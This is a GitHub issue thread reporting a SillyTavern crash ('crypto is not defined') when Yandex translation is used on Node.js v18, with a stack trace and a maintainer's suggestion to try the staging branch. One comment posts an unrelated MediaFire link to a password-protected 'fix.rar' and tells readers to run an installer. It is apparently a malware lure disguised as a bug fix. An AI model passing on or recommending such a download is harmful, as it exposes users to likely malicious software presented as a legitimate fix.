### ISSUE TITLE
[BUG] <SillyTavern crashes when using Yandex as chat translator>

### ISSUE THREAD

**Issue by BarbariSS1** [SillyTavern/SillyTavern#2718]
### Environment

🪟 Windows

### System

Windows 11

### Version

SillyTavern 1.12.5 'release' (5b8681ea)

### Desktop Information

Node.js version is v18.16.1

### Describe the problem

SillyTavern crashes when using Yandex as chat translator

### Additional info

node : Uncaught exception: ReferenceError: crypto is not defined
At line:1 char:4
 & {node server.js 2>&1 | Where-Object {$_ -notmatch 'Security has bee ...
    ~~~~~~~~~~~~~~~~~~~
     CategoryInfo          : NotSpecified: (Uncaught except... is not defined:String) [], RemoteException
     FullyQualifiedErrorId : NativeCommandError
    at uuidv4 (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\src\util.js:301:25)
    at D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\src\endpoints\translate.js:129:18
    at Layer.handle [as handle_request] (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\express\lib\ro
uter\layer.js:95:5)
    at next (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\express\lib\router\route.js:149:13)
    at D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\body-parser\lib\read.js:137:5
    at AsyncResource.runInAsyncScope (node:async_hooks:203:9)
    at invokeCallback (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\raw-body\index.js:238:16)
    at done (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\raw-body\index.js:227:7)
    at IncomingMessage.onEnd (D:\AI\sillytavern\SillyTavern-Launcher\SillyTavern\node_modules\raw-body\index.js:287:7)
    at IncomingMessage.emit (node:events:513:28)

### Please tick the boxes

- [X] I have explained the issue clearly, and I included all relevant info
- [X] I have checked that this [issue hasn't already been raised](https://github.com/SillyTavern/SillyTavern/issues?q=is%3Aissue)
- [X] I have checked the [docs](https://docs.sillytavern.app/) ![important](https://img.shields.io/badge/Important!-F6094E)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Cohee1207** [comment]
You can switch to staging and try again.
